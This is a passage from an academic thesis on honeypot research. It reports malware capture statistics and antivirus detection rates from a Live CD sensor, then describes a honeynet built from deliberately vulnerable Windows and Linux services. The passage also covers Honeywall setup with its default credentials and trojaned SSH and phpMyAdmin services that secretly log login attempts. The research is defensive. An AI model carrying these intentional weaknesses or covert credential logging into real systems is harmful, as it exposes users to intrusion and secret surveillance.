understanding.
The desktop environment as a whole consists of several individual applications that
are split into software packages (see also Hall, 2005). For instance, the KDE base package
comprises all core components such as the default window and file manager, a terminal
emulator to provide access to the command shell, and a control center for administrative purposes. Each program also requires multiple system libraries that are part of the
kdelibs package. Both these packages are included on the Live CD. Further optional
features such as personal information management tools are, as we have already mentioned above, not strictly needed for our purposes and may thus be omitted to reduce
complexity and keep the size of the distribution as small as possible.
The different KDE applications are tightly interconnected and work collaboratively
as it is indicated in Figure 4.13. One of the most important parts of the environment
is the login manager kdm which is mainly responsible for user authentication. It is the
first program to be launched in the KDE startup hierarchy. Kdm displays a graphical login screen and prompts users to enter their credentials. The appearance of this
screen can be customized by editing the kdmrc configuration file which is stored in the
/usr/share/config/kdm directory of the Live CD. Thereby, it is, for instance, possible
to show a short greeting message or a custom logo when logging in. An explanation of
the corresponding configuration directives is given by Buddenhagen (2007).
When a valid username and password are entered, a new desktop session is prepared.
For this purpose, a special startup script is invoked and a so-called master process gets
executed. Similar to the init process of the operating system (cmp. Section 4.3.1.1),
this master process acts as a parent for a number of further services that are started in
71
Figure 4.13: Components of the KDE Platform
the background, e.g., kcminit which supports different profiles and user-specific settings
for hardware devices. The default configuration of these components is suitable for our
distribution and does not need to be altered.
In the last step, the ksmserver session manager is loaded. It sets up the desktop as
well as the control panel, restores the state of previously run programs, and processes
scripts that are stored in a predefined autostart folder. Since these activities greatly
affect the visual design of KDE, applications that are started by the ksmserver are of
particular relevance to the customization of the user interface.
In the following, we illustrate the general customization procedure based on the central
elements of the user environment: The KDE desktop and the control panel provide a
comfortable way to open programs quickly, either by clicking on a desktop icon or by
selecting an item in the system menu which is part of the control panel at the bottom
of the screen. To adapt the appearance and behavior of these components, we can use
the kcontrol and kmenuedit utilities that are integrated in KDE. Additionally, several
built-in functions of the interface are of great help. For example, we are able to add,
change, or remove desktop icons easily by choosing the respective command from a
context menu. It is important to stress though that these modifications always apply
to the current user only. Thus, the user-specific settings have to be transferred to the
system level in order to implement the changes on a global scope. For this purpose, we
must manually copy the individual configuration files to the designated folders in the
directory hierarchy. The specific user and system-wide directories that are relevant for
this process are summarized in Table 4.10 (see also Bastian, 2004).
Although these operations are cumbersome, they must be carried out with great care
72
Directory
/usr/bin
/usr/lib
/usr/share/services
/usr/share/applications
/usr/share/config
/usr/share/icons,
/usr/share/sounds,
/usr/share/wallpapers
~/.kde, ~/.local
Description
Stores the KDE executables, including the startup script
and the KDM binary.
Stores the libraries that are required for the desktop
environment.
Includes configurational settings for internal system services such as text or picture rendering engines.
Contains definition files for the desktop icons.
Contains files with system-wide configurational directives. The file kdeglobals is processed by all KDE applications.
Stores multimedia-related files that can be used by any
KDE program.
Contains user-specific settings and definitions. Configuration files that are stored in this directory tree take
higher precedence over system-wide declarations.
Table 4.10: Important User and System-Wide Directories of the KDE Platform
(Source: Based on Seigo, 2007)
(a) Initialization of the Main Desktop
Environment
(b) Running Instance of the nepenthes
Honeypot
Figure 4.14: User Interface of the Live CD
to maintain the integrity of the system. Once all modifications are completed, we have
to update the file system modules and create a new version of the distribution as described in Section 4.3.3.1. Finally, we only need to burn the generated image to CD in
order to finish the remastering and customization process of the Live CD. Two sample
screenshoots of the user interface are shown in Figure 4.14(a) and 4.14(b).
73
4.3.4 Capturing Autonomously Spreading Malware with the
Live CD
In order to assess the operability of our Live CD, we have implemented a working
prototype and captured autonomously spreading malware over a period of two months,
from March 7, 2008 to May 7, 2008. Our test sensor was deployed in the IP range
of a German private Internet service provider (ISP). Apart from minor reconfiguration
and maintenance breaks, the system was continuously running 24 hours a day. Due to
administrative reasons, the IP address of the machine was dynamically updated every
night.
An overview about the results of our research is subject of the following section.
However, we need to emphasize that these results must be regarded as preliminary.
Further studies have to be conducted in the future to generate more empirically valid
and representative statistics.
4.3.4.1 Overview about the Collected Data
Throughout the observation period, our Live CD sensor was targeted more that 46,000
times. 40 countries were involved in the incidents. More than 98% of all probes were
traced to cities in Germany, the Russian Federation, and the United States though (cmp.
Figure 4.15).
Regarding the intensity of the attacks, the number of malware samples nepenthes
identified and tried to retrieve varied significantly (see Figure 4.16): While we detected
almost 3,300 download attempts on May 4, this number dropped to the smallest value of
21 only three days later on May 7, the end of our experiment. On average, our honeypot
sought to gather 837 binaries per day.
Figure 4.15: Origin and Intensity of Malware Attacks
74
Figure 4.16: Number of Detected Malware Downloads and Submissions per Day
However, it is also important to note that, in many cases, the collection process was
not successfully completed, e.g., because the server the malicious software application
resided on had been shut down in the meantime (cmp. also Provos and Holz, 2007).
For this reason, solely 15,578 executables could be fetched. A list of the most frequent
threats that we have seized with our Live CD can be found in Table 4.11.
Each of the captured files was sent to a central analysis station for further investigation
as explained in Section 4.3.2 (see also the red graph in Figure 4.16). Thereby, we were
able to study its behavior in more detail. In particular, we examined outbound network
connections that were initiated with the external environment as well as manipulations
of the underlying system platform. An example of a summary report that was returned
by the analysis station at the end of the examination process can be found on the
accompanying CD of this thesis. A complete description about the functionality of the
station is given by Willems et al. (2007).
We also checked the set of unique submitted samples with a list of 32 different virus
scanners. A file is defined as unique if its cryptographic checksum is different from
the remaining malware species. A binary that is falsely classified as being uninfected
in the course of this process indicates a severe threat, since it is not yet included in
the definition database of the antivirus vendors and, thus, may potentially bypass the
security restrictions of the local system. In total, 1,013 files were scanned. The results
of these scans are briefly described in the next section.
75
Malware
Worm.VanBot.AX.215
Win32.Virut.AL
Win32.Virut.AL (Variant)
Trojan.Dldr.Delf.buz
Worm.SdBot.100864.22
Worm.SdBot.444416
Trojan.Agent.143360.4
Worm.VanBot.FO
Win32.Virut.AL (Variant)
Win32.Virut.Gen
MD5 Checksum
Submissions
954a98c971fda498f9d1211f18e75cd7
851
0c22f6dc09641566e42984323b869136
523
175dffd2f768887fbd0b156383cf3b05
444
364389256ea74bb06d6825e7ee1689d9
417
7fdfe363d51e27caa1b6d490646e66f5
410
146d61fca77d748f5a5ecff53afd30e4
402
2aa59ba4251795deda72738d1c67be7c
351
bec892aaf3a5d697da7db26bb3d32028
331
1000e2436a560eaeaa01a1029d8f33b4
276
2383438901c46f3672b047961e8533b9
214
Table 4.11: Top Malware Samples Captured with the Live CD
4.3.4.2 Evaluation of the Collected Data
On average, the different virus scanners were capable of correctly identifying almost
82% of the malware samples. However, the quality of the individual software products
partially differed dramatically. As indicated in Figure 4.17, only one of the 32 vendors
detected more than 98% of the malicious applications. In contrast, four scanners erroneously reported more than 20% of the infected binaries as clean. The performance of
the different solutions is illustrated in more detail in Figure 4.18.
Even though most detection rates are comparatively high, it must, however, also be
stressed that about 10% of the captured executables were unrecognized by at least two
vendors. In 27 cases, more than 80% of the scanners failed to discover the security threat.
One binary with the cryptographic checksum b670a676045337c77838c8ab4597dfcb
even completely slipped by and remained hidden from all tested products.
Figure 4.17: Detection Rates of 32 Antivirus Vendors
76
Figure 4.18: Individual Performance of 32 Antivirus Vendors
4.3.5 Summary
In this chapter, we have described the selection and development process of a Live
CD-based honeypot. A Live CD completely runs in memory and provides an operating
system, a number of applications, as well as a basic user environment. When the machine
is rebooted, changes made during runtime are reset, i.e., the decoy may be quickly
restored after a compromise.
Instead of building our own Live CD from scratch, we have decided to remaster an
existing distribution and adjust its features to our needs. For this reason, we have evaluated various potential candidates and selected the Slackware-based Slax as a starting
point for our project. Due to its modular design, it is comparatively easy to adapt.
Furthermore, it is compatible to most modern day computer systems and is actively
supported by a vivid community.
Regarding the honeypot solution, we chose to implement nepenthes, a low-interaction
decoy that is capable of collecting autonomously spreading malware on a large scale by
emulating common vulnerabilities. It is highly scalable, consumes only small amounts of
space and, thus, is well-suited for a Live CD environment with limited system resources.
To ensure the security and integrity of the CD, the honeypot was packaged within
its own file system module and is executed within a so-called jail. The jail provides
77
a pseudo root directory and is physically strictly separated from other parts of the
operating system. Additionally, by shutting down unnecessary services, using a twofactor authentication mechanism for the SSH remote administration server, and defining
access control lists, we hardened the system further against attacks.
We have developed a working prototype of the CD with its own system kernel, boot
loader, and a customized graphical user interface. Over a period of two months, we
have captured malware samples and collected more than 1,000 unique malicious binaries.
Based on the data set, we have evaluated the performance of different antivirus solutions.
In sum, most samples were correctly reported as being suspicious. However, about one
tenth of the executables were not properly recognized by the products and remained
undetected. Our Live CD may help improve detection rates in the long term by finding
new and unknown threats. Thereby, malicious activities on the Internet may potentially
be measured and assessed more accurately.
78
5 Implementation, Deployment, and
Analysis of a Honeynet
In the previous chapter of this thesis, we have described the development process of
a Live CD-based low-interaction honeypot for capturing and analyzing autonomously
propagating malware. As we have pointed out, by emulating a number of known security weaknesses, we were able to attract common species of malicious software, study
their behavior, and generate statistical reports about their spread on the Internet. Although the collected data are beneficial for assessing the general level of threat from an
abstract point of view, we did learn only little on why systems are actually attacked and
what they are used for once a compromise has succeeded. To help answer these questions, we set up a group of high-interaction honeypots within a honeynet. As explained
in Chapter 3, this honeynet is a highly overt network environment as all incoming communication requests are passed to the interconnected machines without being filtered.
On the other hand, outgoing traffic flows are tightly controlled by several layers of data
capture and data control. As a consequence, we may implement full-featured operating
systems, applications, and services that potentially allow monitoring more complex and
sophisticated attacks. At the same time, we can keep the risk for non-affected third
parties at a minimum.
Due to the manifold possibilities for interaction, the individual electronic baits are
likely to attract not only automatically spreading malware, but human attackers as well
(cmp. Curran et al., 2005). In comparison to low-interaction honeypots, we thus have
the chance of gaining a more thorough insight in the psychology of adversaries and learn
more about their tools, tactics, and motives.
In the following section, we outline the architecture of our honeynet and the respective
system environment. We describe the technical specification of the individual honeypots,
illustrate the deployment of the Honeywall, and introduce various tools and utilities that
help monitor, capture, as well as analyze malicious activities.
An overview about the data that we have collected with our honeynet is subject
of Section 5.2. We also sketch common attacks on the decoys that we have frequently
detected during the observation period. Two selected system compromises are presented
in more depth in Section 5.3. We conclude with an analysis of a covert underground
communication channel and a short summary of our findings.
79
5.1 Overview about the Architecture of the
Honeynet and the System Environment
The core of our honeynet consists of three, independently-running high-interaction honeypots that are set up within virtual machines for maintenance reasons as we have
indicated in Chapter 2. Regarding the technical specification of the decoys, we decide
to implement both Microsoft Windows and Linux operating systems. Thereby, we are
able to measure intrusion attempts on two major platforms many desktop and server
machines are based on (cmp. Net Applications, 2009). Additionally, we install several
well-known web applications that commonly fall prey to attacks. These applications usually collaborate with further, underlying technologies such as database engines which are
significantly more complex to administrate and maintain. Due to these reasons and an
often poor quality of the source code (see Holz et al., 2006), vulnerabilities in either of
these software tiers may possibly lead to a total system compromise. As web applications may thus involuntarily act as a “stepping stone into more sensitive parts of the
victim’s network” (Riden et al., 2007), they are well-suited for our research purposes.
We also set up a number of system services with certain misconfigurations that are
likely to be discovered and exploited. For instance, we define improper access rights for a
file transfer server and permit even non-authenticated users to upload and execute their
own files. Thereby, we imitate the behavior of a so-called anonymous server which is
frequently abused by software pirates to share illegally obtained media (see also McClure
et al., 2005; Craig and Burnett, 2005).
Because of the different security weaknesses, our honeypots form attractive targets
for cyber criminals. In order to make their disclosure more difficult, we develop a bogus
website for a fictional university chair, including phony information about lectures and
academic curricula. Thus, we are able to embed the web applications and services in a
more realistic scenario, making the machines appear as legitimate productive systems.
It is important to stress though that an experienced attacker will presumably not be
deceived by these activities but will rather be able to reveal the true nature of the
decoys, e.g., by identifying specific anomalies in the system architecture (see Chapter 2
and Corey, 2003, 2004; Garfinkel et al., 2007). However, as these techniques usually
require certain skills, we can still learn valuable information: As Provos and Holz (2007)
conclude, “although honeypot detection might seem to be of more benefit to malicious
adversaries, in computer security, it is important to understand all aspects of a system
(...) and the flaws of your technology”.
In the last step, we prepare several fake documents that we store on each of our
machines. For example, we compose an executive summary for an imaginary project
that contains valid account names and passwords to one of our honeypots. If an attacker
retrieves the information and tries to log in, we can start tracing activities across multiple
systems. As such, the documents act as honeytokens and prove unauthorized access of
the respective resources (cmp. Spitzner, 2003f). What is more important, we are able
80
to depict interactions between the various decoys, hence creating a potentially more
accurate profile of the intruder as well as her intentions.
The characteristics of the individual honeypots and their components are presented
in more detail in the following.
5.1.1 Technical Specification of the Honeypots
As indicated in the previous section, we implement three electronic baits based on Microsoft Windows and Linux operating systems.
5.1.1.1 Microsoft Windows-Based Honeypot
The first honeypot we deploy runs a Microsoft Windows XP operating system with a
pre-installed service pack 2. Access is permitted for the system administrator as well
as for a non-privileged user. Both accounts are solely protected with weak passwords.
Therefore, we expect adversaries to perform dictionary and brute force attacks over the
network in order to successfully compromise the host.
Additionally, we set up the latest xampp1 distribution by Kai Seidler. It comprises an
Apache web server, the MySQL database management system, a basic file transfer server,
and support for several programming languages such as PHP and Perl. In its default
configuration, the distribution is inherently insecure (cmp. Vogelgesang, 2007). For
example, the phpMyAdmin administrative user interface for the database management
system2 is fully accessible over the Internet. As we will see later, this feature puts the
security of the entire machine at risk.
We also install the phpBB web application3 , a popular forum software which was
originally developed by James Atkinson. The rather outdated version 2.0.8a is exposed
to multiple vulnerabilities that may reveal potentially sensitive information such as the
full path to the root directory (see Vind, 2005). Furthermore, the program contains
several highly critical programming flaws that may help attackers get system access or
manipulate data (see Secunia, 2004; CERT, 2004). Because of these characteristics, our
machine forms a relatively easy target for intruders and is likely to be probed frequently.
5.1.1.2 Linux-Based Honeypots
Apart from the Windows-based honeypot, we run two electronic baits with Linux operating systems that are built on the Fedora Core and Suse distributions.
1
see http://www.apachefriends.org/en/xampp.html
see http://www.phpmyadmin.net/
3
see http://www.phpbb.com/
2
81
• Fedora Core-Based Honeypot
The second decoy within our honeynet setup is implemented upon an installation of the
Fedora Core 3 release4 . It includes the Apache web server and the MySQL database
management system. However, in comparison to the xampp distribution that we have
introduced in the previous section, the configuration of the individual applications is
more secure by default. For instance, the web server is started with non-privileged access
permissions, and logins to databases are restricted to local users only. For this reason,
we assume that intruders must attempt more sophisticated penetration strategies, e.g.,
executing exploits, to manipulate these services.
Similar to the Windows-based honeypot, we run a web application, namely the TikiWiki content management system5 . Version 1.8.4 of the software is affected by several
critical security weaknesses (cmp. Secunia, 2009b). For example, due to an input validation error, attackers may upload and run their own scripts in a temporary directory (see
CVE, 2005). By passing specially crafted parameters to certain pages, it is also possible
to read arbitrary files on the system and disclose sensitive information (see iDefense,
2005).
In the next step, we set up communication and file transfer programs that form valuable targets for adversaries as well: First, we compile an outdated version of the WUFTPD daemon6 which is prone to a remote buffer overflow (see CVE, 2003). Since the
exploit code for this vulnerability is publicly available (see Dong-Hun, 2003), we suppose the computer to get compromised within a short amount of time. Furthermore, we
redefine the configurational settings of the service and permit world-writable access to
certain directories. As a consequence, our system appears as an anonymous server to
the external environment and is likely to attract software pirates as explained in Section
5.1. Second, we install a secure shell server that contains a number of buffer management flaws. When abused, attackers may inject malicious instructions and gain control
of the machine (see CERT, 2003b). The server is also of great interest to intruders,
because data flows are always sent over an encrypted channel. As a result, monitoring
and filtering devices such as firewalls can be effectively bypassed.
• Suse-Based Honeypot
The third and last honeypot within our honeynet is built on a Suse Linux operating
system, version 9.3. As is the case with the two other decoys, we run the default Apache
web server and the MySQL database management system that are provided with the
distribution. The latter is vulnerable to a remote buffer overrun and may cause arbitrary
code execution or lead to a denial of service situation (see SecurityFocus, 2006a). The
respective exploit is published by Paola (2006).
4
see http://fedoraproject.org/
see http://info.tikiwiki.org/tiki-index.php
6
see http://www.wu-ftpd.org
5
82
We also deploy three web-based programs which may be attacked with different techniques: The phpMyFAQ application7 permits implementing a bulletin board for frequently asked questions (FAQs). Version 1.6.6 suffers from various security weaknesses
(cmp. Secunia, 2009a). For instance, input parameters are not sanitized properly. Consequently, adversaries are able to manipulate database queries, inject malicious code,
and penetrate the underlying system (see CVE, 2006b).
The TR NewsPortal software8 is a simple newsreader by Adam Glowienka. Due to an
input validation error in the release version 0.36a, attackers can include their own scripts
and compromise the host as demonstrated by Kacper (2006) (see also SecurityFocus,
2006b).
Furthermore, the version of the phpMyAdmin database management utility that is
distributed with our Linux installation contains multiple cross site scripting (XSS) vulnerabilities. Thereby, it is possible to insert malicious code instructions and potentially disclose sensitive information, e.g., authentication credentials (cmp. SecurityFocus,
2006c).
Finally, we install a secure shell as well as a Samba server to support remote interactions with the core system. A samba server facilitates communication between machines
in a hybrid environment by maintaining a number of directories that are globally shared
in a network. Thereby, computers running Linux operating system can, for example,
retrieve resources on a Windows-based host and vice versa (cmp. Eckstein et al., 2007).
We define several of these network shares with full access permissions on each honeypot. Thus, once a decoy is compromised, it may be used as a starting point to attack
the remaining systems within our honeynet. As a result, we can monitor incidents on a
network-wide scope and gain a more thorough understanding about the strategies and
intentions of the intruder.
The technical specifications of the individual honeypots are summarized in Table 5.1.
As can be seen, the installed services and applications contain various vulnerabilities
that are, for example, caused by input validation errors and poorly designed access
permissions. When a decoy is successfully penetrated, it poses a significant threat to
other machines on the network as well as to non-affected third parties. That is why we
must make sure adversaries do not accidentally or purposefully harm systems outside of
the honeynet (cmp. Honeynet Project, 2004b, p. 38). We can mitigate that risk with
the help of the Honeywall. The corresponding setup is subject of the following section.
7
8
see http://www.phpmyfaq.de/
see http://www.newsportal.one.pl/
83
Honeypot - Windows XP, Service Pack 2
Description
Service Name
Web server which is required to run PHP-based appliApache 2.2.8
cations and display dynamic content.
FTP server that allows exchanging files over the Internet. The default authentication credentials for the administrative account are published “in the wild”. ThereFileZilla 0.9.25 beta
fore, intruders may easily gain access and explore the
entire directory hierarchy as well as upload their own
tools.
Database management system with built-in support for
remote logins. The application can be quickly comproMySQL 5.0.51
mised, because the root superuser account is not protected with a password.
Description
Web Application
Forum software which contains several highly critical
programming flaws and may disclose sensitive informaphpBB 2.0.8a
tion as well help attackers get access to the system.
Front end for the MySQL database management system.
The application is fully accessible over the network and
phpMyAdmin 2.11.4
permits manipulating all databases that are stored on
the machine.
Honeypot - Fedora Core 3
Description
Service Name
Database management system which is solely protected
with a weak password. Due to the configurational setMySQL 3.23.58
tings, logins are only possible after gaining shell-level
access though.
Secure shell server that contains several buffer management flaws. If the vulnerabilities are abused, arbitrary
commands may be executed on the host. Additionally,
OpenSSH 3.7.1p1
the server permits adversaries establishing encrypted
communication channels. Thus, network eavesdropping
is made more difficult.
FTP server that permits anonymous write operations.
As a result, the server can be abused by software pirates
WU-FTPd 2.6.0
to store copyright-violated material.
84
Description
Content management system that does not validate user
input properly. Consequently, intruders may upload
TikiWiki 1.8.4
their own scripts as well as read arbitrary files on the
system.
Honeypot - Suse Linux 9.3
Description
Service Name
Database management system that is affected by a
buffer overrun vulnerability and may cause a denial of
MySQL 4.1.10a
service situation.
Secure shell server that contains several buffer management flaws. If the vulnerabilities are abused, arbitrary
commands may be executed on the host. Additionally,
OpenSSH 3.7.1p1
the server permits adversaries establishing encrypted
communication channels. Thus, network eavesdropping
is made more difficult.
Software for providing file as well as printer sharing services across a network. Since network shares are defined
Samba 3.0.12-5
on each machine, they may be used as a starting point
for further attacks.
Description
Web Application
Front end for the MySQL database management system.
The installed version is vulnerable to multiple cross site
phpMyAdmin 2.6.1
scripting attacks and allows intruders to insert malicious
code instructions.
Bulletin board software for frequently asked questions
that is prone to malicious SQL and code injection techphpMyFAQ 1.6.6
niques that may be exploited to gain system access.
Simple newsreader program that contains an input valTR NewsPortal 0.36a idation error and enables attackers to include their own
scripts.
Web Application
Table 5.1: Technical Specification of the Honeypots
5.1.2 Deployment of the Honeywall
As we have already explained, the Honeywall acts as a gateway system to the honeynet
where all traffic flows have to pass through. It comprises various monitoring and filtering
devices such as IPTables, Snort, and Snort Inline that we have described in depth in
85
Chapter 3. With the help of these applications, incoming and outgoing network packets
can be inspected and, if required, even be discarded. Thereby, attacks on the external
environment can be effectively prevented. As such, the gateway meets the requirements
for data control as imposed by the Honeynet Project (2004a) which are crucial to a
safe deployment of electronic baits. Moreover, it satisfies the conditions concerning
data capture and data analysis by providing several tools for monitoring, logging, and
investigating malicious activities (see also Chapter 3). Because of these characteristics,
the Honeywall is often regarded as the “heart” of a honeynet (cmp. Provos and Holz,
2007).
We may easily set up the whole system including all components with the Roo CD
which is distributed by the Honeynet Project. It can be downloaded for free from the
project homepage9 . When the CD is booted, it automatically begins to install a hardened
Linux operating system. During this process, existing partitions and files on the hard
disk of the machine are overwritten. For proper functionality in later use, we recommend
a computer with at least 512 MB of memory, an x86 Intel Pentium processor, 10GB of
free space, and three network interface cards (NICs) (see Honeynet Project, 2007).
After completing the installation procedure, the system is rebooted, and we can start
to customize the Honeywall according to our needs. For this purpose, we must log in
with the default authentication credentials (username roo, password honey), switch to
the superuser mode with the same password, and run the menu command to invoke the
main configuration utility for the honeynet. The different configuration settings and
parameters may then be adjusted with a dialog-based interview wizard. An overview
about the most important options that must be specified during the interview is given
in Table 5.2, the entire configuration file can be found on the accompanying CD of this
thesis.
Configuration Options
Honeypot-Related Options
Management Interface-Related Options
9
Description
Honeypot-related options mainly comprise the network configuration for the
individual decoys, e.g., the assigned IP
address.
With the help of these options, it is possible to set the network parameters for
the Walleye web management interface
such as the address of the default gateway, the DNS servers that are associated with the application, or the system name of the host.
see https://projects.honeynet.org/honeywall/
86
CRLM (Connection Rate Limiting
Mode) options specify the number of
outgoing connections that may be initiated by the honeypots before being filtered. The recommended settings for
these options were outlined in Chapter 3.
Address filtering options include information about black and white lists that
control what machines are granted or
rejected access to the honeynet. Additionally, a so-called fence list can be
defined in order to block outgoing connections from a decoy to specific network segments.
With these options, automatic email
alerts may be enabled or disabled that
are sent to the honeynet administrator
once an incident is detected by the Honeywall.
These options help configure the server
component of the Sebek data monitoring utility. For instance, the destination address and the network port for
the Sebek notification packets can be
specified.
CRLM Options
Address Filtering Options
Alerting Mode Options
Sebek Options
Table 5.2: Important Configuration Options of the Honeywall
At the end of the interview, the affected filtering and monitoring services are restarted.
However, before putting the Honeywall into operation, we adapt the local time zone and
synchronize the hardware clock as illustrated by the Honeynet Project (2005c). These
steps are of utter importance to recover the exact sequence of an incident during the
investigation phase at a later point of time. Furthermore, we initialize Tripwire10 , a
host-based intrusion detection system, that is already included in the system (see also
Honeynet Project, 2005b). It periodically performs an integrity check for each file.
Thereby, potential manipulations of the individual components can be discovered.
When all operations are finished, we may retrieve the status of the Honeywall at all
times using the Walleye web management interface which is part of the Roo distribution.
The management interface must be launched over an encrypted channel for security
10
see http://www.tripwire.org/
87
Figure 5.1: Main Screen of the Walleye Web Management Interface
reasons. After logging in as the admin user, a summary of the traffic flows entering or
leaving the honeynet as well as the number of detected intrusions is displayed in the
upper left corner of the screen (see Figure 5.1). By clicking on a highlighted element
in one of the different columns, we can request additional information about network
activities (see Figure 5.2). It is also possible to inspect specific connections in more detail,
e.g., to examine a penetration attempt that was detected by our Honeywall as shown
in Figure 5.3. In the given example, an attacker with the IP address 218.44.xxx.xxx
repeatedly failed to access a network share on our Microsoft Windows honeypot via the
Netbios and Samba (SMB) protocols.
In addition to data analysis-related features, Walleye also allows to fully reconfigure
the honeynet architecture and supports changing certain system settings such as the keyboard language or the hostname. As a consequence, we can perform many administrative
tasks comfortably over the Internet without needing to log in to the local machine. In
summary, these mechanisms make the web management interface the primary tool for
the everyday observation and maintenance of the honeynet.
88
Figure 5.2: Overview about the Network Flows from/to the Honeynet
Figure 5.3: Example of an Intrusion Attempt on a Honeypot
5.1.3 Preparation of the System Environment
Even though the Honeywall implements sophisticated applications to capture, control,
and analyze malicious activities, we recommend setting up several other programs before
connecting the honeynet to the external environment. These programs either help collect
more extensive information about adversaries or facilitate the post-incident investigation
process after a decoy has been compromised.
5.1.3.1 Implementation of Data Capture-Related Programs
• Sebek
Sebek11 is a utility for capturing activities on a honeypot and is maintained by the
Honeynet Project. We have already described its architecture as well as its technical
11
see http://www.honeynet.org/tools/sebek/
89
specification in detail in Chapter 3. Therefore, only the deployment process of the utility
is presented in the following.
As we have explained, Sebek consists of a client as well as a server component. The
latter is part of the Honeywall, while the client component must be separately installed
on each decoy.
On Linux operating systems, Sebek is implemented as a loadable kernel module, i.e., it
can be dynamically attached to the kernel at runtime (cmp. Kroah-Hartman, 2006). For
this reason, in order to build the module, we must first download the source code for the
kernel the utility will later run on. In the next step, the source code must be prepared
and compiled as outlined in Section 4.3.3.5 with respect to the custom kernel of our
Live CD. When this operation is completed, we are able to start the configuration and
compilation process of the Sebek module. The generated archive can then be transferred
to the target system and be decompressed. To deploy the Sebek client, we simply need to
run the respective install script. However, before we execute the script, we need to make
sure all its configuration parameters are correctly specified as outlined by the Honeynet
Project (2003c). For instance, it is particularly important to define the MAC (Media
Access Control) address and the destination port of the gateway system, otherwise clientrelated notification packets are not delivered to the Sebek server and cannot be analyzed
on the Honeywall.
When the module has been successfully installed, keystrokes and system relevant
information on the honeypot are captured until the machine is rebooted. In turn, if an
adversary manages to restart the computer her activities are not recorded any longer.
Therefore, we must carefully monitor the state of our decoys at all times and reinstall
the monitoring devices if necessary.
The client component is also available for Microsoft Windows operating systems. It
is implemented as a device driver and may be easily set up by running an installation
wizard which is part of the main program archive. In our case, however, the affected
systems tended to get extremely unstable and permanently crashed with a blue screen
after the application had been deployed. For this reason, we omitted the Sebek package
for our Windows XP honeypot, and data were merely collected with the help of network
monitoring devices.
• Trojaned System Services
The Sebek utility is most helpful to monitor attackers after a system has been successfully compromised. On the other hand. it is not capable of gathering extensive
information about penetration attempts. For example, when an intruder fails to log in
to a specific machine, the respective authentication credentials are not recorded. In case
strong encryption algorithms are being used, we are not able to recover these pieces of
information from the captured network logs either. The data is of high value though,
because common usernames and passwords that are tested during an attack can be
identified. Therefore, to close the information gap, we implement trojaned versions of
90
Figure 5.4: Example of a Trojaned System Service
a number of system services such as the SSH server or the phpMyAdmin database administration program. For this purpose, we edit the source code of the applications and
adapt their authentication procedure as follows: When an intruder enters a username
and corresponding password, the data is silently written to a special file before being
encrypted and getting processed. The file is protected with our own encryption key to
conceal its content. We also restore its access and modification timestamp so it does
not stand out from other files in the same directory. The entire process for a sample
trojaned system service is illustrated in Figure 5.4.
Even though the approach helps capture data about adversaries it suffers from several disadvantages: First, we store security-relevant information directly on a honeypot.
Hence, the data may potentially be discovered and deleted. Consequently, the requirements and standards as postulated by the Honeynet Project (2004a) are violated. Second, a skilled attacker can rather easily detect the manipulation. For instance, by
running the strace command, it is possible to monitor all files that are referenced by
a process. Due to these weaknesses, the solution is only applicable on an interim basis
and must be replaced by more efficient implementations in the long term.
5.1.3.2 Implementation of Data Analysis-Related Programs
After a decoy has been compromised, we usually have to parse through an enormous
amount of data in order to recover the individual steps and activities of the intruder.
These operations are extremely time-consuming. For example, members of the Honeynet
91
Project (2004c) expect to “spend up to forty hours of analysis for each hour of attack
traffic that has been collected from the honeynet”. Furthermore, an analysis is often
complex, because multiple sources of information such as network packet dumps or
log files must be linked in order to see “the big picture”, corroborate hypotheses, and
draw conclusions. However, various tools may significantly support the work of security
professionals and honeynet administrators and can be of great help when examining an
incident. These tools can be divided into different categories and are briefly described
in the following.
• Network-Related Analysis Tools
As we have already explained, all network flows entering or leaving the honeynet are
recorded with the help of several data capture applications (see Chapter 3 and Honeynet
Project, 2004a). These flows are stored within so-called PCAP (packet capture) files and
are essential when certain actions of an adversary must be studied in more detail. To
process these files efficiently, we recommend installing four tools, namely Wireshark,
SSLDump, Honeysnap, and DataEcho.
Wireshark12 is, according to its creators, one of the leading network analyzers (see also
Orebaugh et al., 2007) and is available for many different platforms, including both Linux
as well as Microsoft Windows operating systems. In contrast to similar applications such
as Tcpdump13 , PCAP files are not processed on the system console but are presented
in a feature-rich graphical user interface. Thereby, it is, for instance, easily possible
to extract the communication protocol of an entire FTP session (see Figure 5.5) or to
inspect specific packet streams with the help of a powerful filtering language. As we will
see later, Wireshark is also capable of dealing with encrypted traffic once the correct key
is provided.
Even when a network analyzer is being used, a secured communication channel may
easily remain undiscovered in the vast of network flows if it is established on non-standard
system ports. With regards to this case, we can run the SSLDump utility by Eric
Rescorla14 . It enables to identify any connections that are protected with the SSL (Secure
Socket Layer) or TLS (Transport Layer Security) algorithms. Although the underlying
data packets cannot be read unless a so-called keyfile and corresponding password are
specified, encrypted network activities within a honeynet are suspicious by nature and
should be carefully watched (cmp. Honeynet Project, 2004b).
To get a general overview about the contents of a PCAP file, the Honeysnap program
by Arthur Clune is very useful15 . It is distributed free of charge by members of the
Honeynet Project and requires a pre-installed Python environment16 to be executed
12
see
see
14
see
15
see
16
see
13
http://www.wireshark.org/
http://www.tcpdump.org/
http://www.rtfm.com/ssldump/
https://projects.honeynet.org/honeysnap/
http://www.python.org/
92
Figure 5.5: Restoring a Captured FTP Session with Wireshark
properly. With Honeysnap, we are able to generate summary reports about traffic
flows, dissect individual connections, and analyze certain communication protocols in
depth. We can also search for specific keywords and commands within a recorded IRC
(Internet Relay Chat) session. The latter is particularly interesting, because the IRC
protocol is frequently abused by adversaries to control so-called botnets, i.e., networks
of compromised machines (see Holz, 2005; Bächer et al., 2008).
Finally, we suggest installing DataEcho17 by the Solera Networks group which is particularly suitable for analyzing web application-related activities. It implements its own
web browser and permits viewing page requests and responses comfortably in a graphical
window. In the example shown in Figure 5.6, DataEcho is capable of restoring an attack
tool that was run during an intrusion of one of our decoys.
17
see http://sourceforge.net/projects/data-echo/
93
Figure 5.6: Analyzing Web-Based Attacks with DataEcho
• File-Related Analysis Tools
Adversaries often transfer their own tools and applications to the target machine, either
to fully penetrate the system or to use it as a starting point for further attacks (cmp.
Honeynet Project, 2000b). In many cases, these tools are erased after being executed
though in order to hide traces and evade detection. On the other hand, the programs
may provide significant hints concerning the origin, intentions, and skills of the attacker
and, therefore, are worth restoring.
To recover deleted information on a honeypot, we can try to analyze sections of
memory as well as file partitions on the respective hard disks. This approach is explained
in detail by Farmer and Venema (2005). Alternatively, we may attempt to reconstruct
the affected data directly from our network records. We present two tools that are
explicitly designed for these purposes.
94
With PEHunter by Tillmann Werner18 , we can extract Microsoft Windows executables
out of the network traffic. The application consists of a server and client component
and must be built and executed on a Linux operating system as shown in Listing 5.1.
